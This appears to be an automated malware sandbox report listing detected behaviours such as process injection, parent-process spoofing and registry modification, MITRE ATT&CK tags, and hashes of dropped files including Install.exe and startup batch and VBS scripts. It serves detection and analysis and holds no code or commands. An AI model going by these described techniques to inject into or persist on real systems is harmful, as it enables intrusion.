- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac3d19fbb5c5f10833f1882308f77548

SHA1
ac880466fd99a5719fedc7289b00d78ba7088e06

SHA256
3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df

SHA512
b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
5f640bd48e2547b4c1a7421f080f815f

SHA1
a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

SHA256
916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

SHA512
a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
1d49ecc80cc3559d7e68247843c2fee4

SHA1
36ca1f8754dc1ca4ad5c04e1168d56dd89ecacb6

SHA256
69a2078ef915608fda52e6d4ed5b23f2117db7f297c9cc6e462d49878d303f89

SHA512
2c38d9f96738a6e3d3cc584d2c3d38879f8c18ce025c6388c3d72665dd527a12829d96ea4ab1a923deca986c1eff9b775468bd1a0d12f4aeb56d2c34370c30f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\BU6OljZoUHIB.bat

Filesize
276B

MD5
eea50a407f01307a7454dcf062fedced

SHA1
751beb2faacf46a46b8c713575a73cd8252db6a9

SHA256
96c77e1bfd70ffa39c902c702a7cb3049f8894661c938fab8cbd6e301a36a557

SHA512
7fcd1abf0d1bb0e591015fd44d4a4ba7be49d74669893a646f156516a07d8650ec9b7da14debca2b66c5f664fbe36d5e3617005c58db1753517def8b87f40ee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe

Filesize
163KB

MD5
051b3f7c30caf2eedbed29daa6192efb

SHA1
a3e0f31e4b4367e5af06f71e7718e7d64ceb250d

SHA256
6cd0c5b5b528c15ad28d9f8e44ee2b4e46d8942e8c0592e89c056a3a3661c3b3

SHA512
93288a5e145ebf48fb5b536cf331159dad81c1c0458099b5cfc649fddc9a5755739cab9d46c8a3f562dba1ed7ed4852c51eaebd73e9ea8ee28f053df22c74158

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4ciwvux4.tgc.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$sxr-Logs\05-29-~1

Filesize
224B

MD5
1f446e9e1a787f0ed1a2d0102637b76c

SHA1
12d519e671e2d3bc4206399c87c4a6bc34528ab8

SHA256
0853e4257573a0bb560e5cfa4461157d0879aa57a054b44c50b475af54caa628

SHA512
b1768fe526b7c05bc56466c54c4a81ebe426e164690ea1a898b4a3000b88e5fba2f93b0b1770e21531eb86eb2887598c15e5fd32105b5b6c59de5fa6bcd3a2e4

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_987.bat

Filesize
1003KB

MD5
d6d62f532591a7d034abac21eff0b57b

SHA1
94c28efce74a67eb18d28bd51f65d285c8d1caef

SHA256
070f7c800e8278b2cad111635cec3c501ff0aa9aa93fdd9529fcb8736a06d56d

SHA512
26f94770e0d250aa6e063af8d5422848a72753a72b20e62b33a76fef5453cdd9e1f70466a935ef0dec145af9b293e12a6ec0e9101f0bd8e80edd3f4be706294a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_987.vbs

Filesize
115B

MD5
ff8ed7918e53a9c226273003a64b2988

SHA1
8dd99ed7c69139fea5f00c57f638256a08bfe20d

SHA256
315acecfa7bc20388f82a092b988270f6676e21507ea487f828b74105aad7848

SHA512
54c57d250c9553cb099208ac6fcf2b6d98758910125d1c0de6458154329e28d676e3bbc516caf8f53c41265d84877f10d3efeaedd3d113b70c98b1b1f779c597

Download Submit
memory/1212-8-0x00000000082D0000-0x0000000008336000-memory.dmp

Filesize
408KB

Download
memory/1212-12-0x0000000008200000-0x000000000821C000-memory.dmp

Filesize
112KB

Download
memory/1212-13-0x0000000008790000-0x00000000087DB000-memory.dmp

Filesize
300KB

Download
memory/1212-25-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/1212-31-0x00000000097D0000-0x00000000097EA000-memory.dmp

Filesize
104KB

Download
memory/1212-30-0x000000000B230000-0x000000000B8A8000-memory.dmp

Filesize
6.5MB

Download
memory/1212-32-0x00000000097A0000-0x00000000097A8000-memory.dmp

Filesize
32KB

Download
memory/1212-33-0x0000000009A80000-0x0000000009B72000-memory.dmp

Filesize
968KB

Download
memory/1212-34-0x000000000D8B0000-0x000000000DDAE000-memory.dmp

Filesize
5.0MB

Download
memory/1212-14-0x0000000008A70000-0x0000000008AE6000-memory.dmp

Filesize
472KB

Download
memory/1212-9-0x0000000008340000-0x0000000008690000-memory.dmp

Filesize
3.3MB

Download
memory/1212-7-0x0000000008260000-0x00000000082C6000-memory.dmp

Filesize
408KB

Download
memory/1212-0-0x0000000073DBE000-0x0000000073DBF000-memory.dmp

Filesize
4KB

Download
memory/1212-231-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/1212-6-0x0000000007970000-0x0000000007992000-memory.dmp

Filesize
136KB

Download
memory/1212-5-0x0000000007B50000-0x0000000008178000-memory.dmp

Filesize
6.2MB

Download
memory/1212-4-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/1212-3-0x0000000005250000-0x0000000005286000-memory.dmp

Filesize
216KB

Download
memory/1976-282-0x00007FF870EC0000-0x00007FF87109B000-memory.dmp

Filesize
1.9MB

Download
memory/1976-281-0x0000020D62C40000-0x0000020D62C6A000-memory.dmp

Filesize
168KB

Download
memory/1976-283-0x00007FF86EEF0000-0x00007FF86EF9E000-memory.dmp

Filesize
696KB

Download
memory/1976-259-0x0000020D62DF0000-0x0000020D62E66000-memory.dmp

Filesize
472KB

Download
memory/1976-256-0x0000020D62CC0000-0x0000020D62CE2000-memory.dmp

Filesize
136KB

Download
memory/2016-64-0x0000000070990000-0x00000000709DB000-memory.dmp

Filesize
300KB

Download
memory/2016-65-0x00000000094A0000-0x00000000094BE000-memory.dmp

Filesize
120KB

Download
memory/2016-70-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/2016-158-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/2016-44-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/2016-71-0x0000000009740000-0x00000000097E5000-memory.dmp

Filesize
660KB

Download
memory/2016-45-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/2016-46-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/2016-72-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/2016-73-0x00000000099F0000-0x0000000009A84000-memory.dmp

Filesize
592KB

Download
memory/2016-63-0x00000000094C0000-0x00000000094F3000-memory.dmp

Filesize
204KB

Download
memory/2016-166-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/4568-205-0x000000000A530000-0x000000000A5C2000-memory.dmp

Filesize
584KB

Download
memory/4568-295-0x0000000008FE0000-0x000000000901E000-memory.dmp

Filesize
248KB

Download
memory/4568-315-0x000000000A160000-0x000000000A16A000-memory.dmp

Filesize
40KB

Download
memory/4568-234-0x00000000069A0000-0x00000000069B2000-memory.dmp

Filesize
72KB

Download
memory/4568-204-0x000000000A390000-0x000000000A3FC000-memory.dmp

Filesize
432KB

Download
memory/4760-291-0x00007FF86EEF0000-0x00007FF86EF9E000-memory.dmp

Filesize
696KB

Download
memory/4760-289-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4760-285-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4760-287-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4760-286-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4760-284-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4760-290-0x00007FF870EC0000-0x00007FF87109B000-memory.dmp

Filesize
1.9MB

Download
memory/4988-243-0x00000000095B0000-0x00000000095EC000-memory.dmp

Filesize
240KB

Download